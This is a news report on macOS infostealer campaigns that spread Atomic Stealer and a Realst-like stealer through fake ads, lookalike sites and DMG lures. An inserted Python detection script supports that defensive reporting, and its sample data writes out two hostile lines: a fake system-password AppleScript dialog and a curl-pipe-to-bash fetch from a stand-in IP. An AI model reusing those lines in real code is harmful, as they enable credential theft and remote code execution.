Malicious ads and fake websites are being used as a channel to spread two different stealer malware families, including Atomic Stealer, targeting Apple macOS users.
Ongoing infostealer attacks against macOS users may employ multiple methods to compromise victims' Macs, but they all operate with the ultimate goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.
One such attack chain targets users who search for Arc Browser on search engines like Google, serving them fake ads that redirect to a lookalike site ("airci[.]net") hosting the malware.
“Interestingly, the malicious website cannot be accessed directly, as it returns an error,” said security researchers Jaron Bradley, Ferdous Saljooki and Maggie Zirnhelt. “It can only be accessed via a generated sponsored link, presumably to evade detection.”
The disk image file downloaded from the counterfeit website ("ArcSetup.dmg") delivers Atomic Stealer, which is known to prompt users to enter their system password via a fake dialog and ultimately facilitate information theft.
Jamf said it also discovered a fake website, meethub[.]gg, that claims to offer free group meeting scheduling software but actually installs another stealer that can collect data from users' keychains, credentials stored in web browsers, and information from cryptocurrency wallets.
Much like Atomic Stealer, the malware – which is said to overlap with a Rust-based stealer family known as Realst – prompts the user for the macOS login password using an AppleScript call to carry out its malicious actions.
Attacks using this malware are said to have approached victims under the guise of discussing job opportunities and interviewing them for a podcast, subsequently asking them to download an app from meethub[.]gg to join a video conference provided in the meeting invitations.
“These attacks are often concentrated against those operating in the cryptocurrency industry as such efforts can lead to large gains for the attackers,” the researchers said. “Industry players should be extremely aware that it is often easy to find public information that they are an asset holder or can easily be linked to a company placing them in this industry.”
The development comes as MacPaw's cybersecurity division, Moonlock Lab, revealed that malicious DMG files ("App_v1.0.4.dmg") are being used by threat actors to distribute stealer malware designed to extract credentials and data from various applications.
This is achieved via an obfuscated AppleScript and a bash payload retrieved from a Russian IP address, the former of which is used to display a deceptive prompt (as mentioned above) that tricks users into providing their system password.
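One defensive check the behaviour described above suggests, as an added example that is not from the Jamf or Moonlock reports: score process-execution events for an osascript dialog with masked input asking for a password, for a parent process running out of a mounted disk image, and for a shell piping remote content into an interpreter. The event records, paths and the TEST-NET address are constructed sample data.

```python
import re

# Constructed sample of process-execution records (binary path, argv, parent
# path), in the shape an EDR or unified-log consumer might hand to a detector.
SAMPLE_EVENTS = [
    {"path": "/usr/bin/osascript",
     "argv": ["osascript", "-e",
              'display dialog "macOS wants to make changes. Enter your password." '
              'default answer "" with icon caution with hidden answer'],
     "parent": "/Volumes/ArcSetup/ArcSetup.app/Contents/MacOS/ArcSetup"},
    {"path": "/usr/bin/osascript",  # benign AppleScript use: no masked input
     "argv": ["osascript", "-e", 'display notification "Backup complete"'],
     "parent": "/Applications/BackupTool.app/Contents/MacOS/BackupTool"},
    {"path": "/bin/bash",  # second-stage fetch from a DMG-hosted app
     "argv": ["bash", "-c", "curl -s http://203.0.113.5/p.sh | bash"],
     "parent": "/Volumes/App_v1.0.4/App.app/Contents/MacOS/App"},
]

# "with hidden answer" is the AppleScript flag that masks typed input, which is
# what a fake system-password prompt needs.
HIDDEN_ANSWER = re.compile(r"display dialog.*with hidden answer", re.I | re.S)
PASSWORD_WORDS = re.compile(r"password|passcode|credential", re.I)
FETCH_AND_RUN = re.compile(r"(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.I)


def score_event(ev):
    """Return the list of reasons this event resembles the stealer behaviour."""
    reasons = []
    cmd = " ".join(ev["argv"])
    if ev["path"].endswith("osascript") and HIDDEN_ANSWER.search(cmd):
        reasons.append("osascript dialog with masked input")
        if PASSWORD_WORDS.search(cmd):
            reasons.append("dialog text asks for a password")
    if ev["parent"].startswith("/Volumes/"):
        reasons.append("parent runs from a mounted disk image")
    if ev["path"].endswith(("/bash", "/sh", "/zsh")) and FETCH_AND_RUN.search(cmd):
        reasons.append("shell pipes remote content into an interpreter")
    return reasons


def detect(events, threshold=2):
    """Return indices of events that trip at least `threshold` signals."""
    return [i for i, ev in enumerate(events) if len(score_event(ev)) >= threshold]


if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["path"], score_event(SAMPLE_EVENTS[i]))
```

The threshold keeps a lone `/Volumes/` parent (any app launched from a DMG) from alerting on its own; tune it to the environment's baseline.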
“Disguised as a harmless DMG file, it tricks the user into installing it via a phishing image, convincing them to bypass the Gatekeeper security feature of macOS,” said security researcher Mykhailo Hrebeniuk.
The development is a sign that macOS environments are increasingly threatened by stealer attacks, with some strains even featuring sophisticated anti-virtualization techniques, activating a self-destructive kill switch to evade detection.
In recent weeks, malvertising campaigns have also been observed pushing the FakeBat loader (also known as EugenLoader) and other information stealers like Rhadamanthys via a Go-based loader, using bait sites for popular software like Notion and PuTTY.